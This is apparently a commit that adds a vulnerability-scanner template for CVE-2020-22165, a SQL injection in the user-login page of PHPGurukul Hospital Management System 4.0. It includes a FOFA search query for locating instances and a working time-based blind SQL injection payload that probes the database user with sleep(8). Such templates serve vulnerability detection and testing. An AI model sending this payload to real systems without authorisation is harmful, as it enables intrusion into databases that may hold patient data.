Create CVE-2020-22165.yaml

2026-01-31 07:43:27 +08:00 · 2025-10-09 15:32:38 +05:30
parent 850b8707dd
commit 2fb20ee36a
1 changed files with 62 additions and 0 deletions
--- a/http/cves/2020/CVE-2020-22165.yaml
+++ b/http/cves/2020/CVE-2020-22165.yaml
@@ -0,0 +1,62 @@
+id: CVE-2020-22165
+
+info:
+  name: PHPGurukul Hospital Management System 4.0 - SQL Injection
+  author: ritikchaddha
+  severity: high
+  description: |
+    PHPGurukul Hospital Management System in PHP v4.0 has a SQL injection vulnerability in \hms\user-login.php. Remote unauthenticated users can exploit the vulnerability to obtain sensitive database information.
+  impact: |
+    Successful exploitation allows attackers to access sensitive data from the database, potentially leading to data leakage and further compromise of the application.
+  remediation: |
+    Upgrade to the latest version or apply proper input sanitization and parameterized queries to mitigate this vulnerability.
+  reference:
+    - https://github.com/itodaro/PHPGurukul_Hospital_Management_System4.0_cve
+    - https://nvd.nist.gov/vuln/detail/CVE-2020-22165
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cve-id: CVE-2020-22165
+    cwe-id: CWE-89
+    cpe: cpe:2.3:a:phpgurukul:hospital_management_system:4.0:*:*:*:*:*:*:*
+  metadata:
+    verified: true
+    max-request: 3
+    vendor: phpgurukul
+    product: hospital_management_system
+    fofa-query: title="Hospital Management System" && body="HMS"
+  tags: cve2020,cve,hms,cms,sqli,phpgurukul
+
+flow: http(1) && http(2)
+
+http:
+  - raw:
+      - |
+        @timeout: 30s
+        POST /hms/user-login.php HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers:
+      - type: dsl
+        dsl:
+          - 'contains(body, "Hospital Management")'
+          - 'status_code == 200'
+        condition: and
+        internal: true
+
+  - raw:
+      - |
+        @timeout: 30s
+        POST /hms/user-login.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        username=a' and 1=2 union select 1,2,if(substring((select user() limit 0,1),1,1)='r',sleep(8),1),4,5,6,7,8,9#&password=asfsafafsafsaf&submit=1&submit=
+
+    stop-at-first-match: true
+    matchers:
+      - type: dsl
+        dsl:
+          - 'duration>=8'
+          - 'status_code == 200'
+        condition: and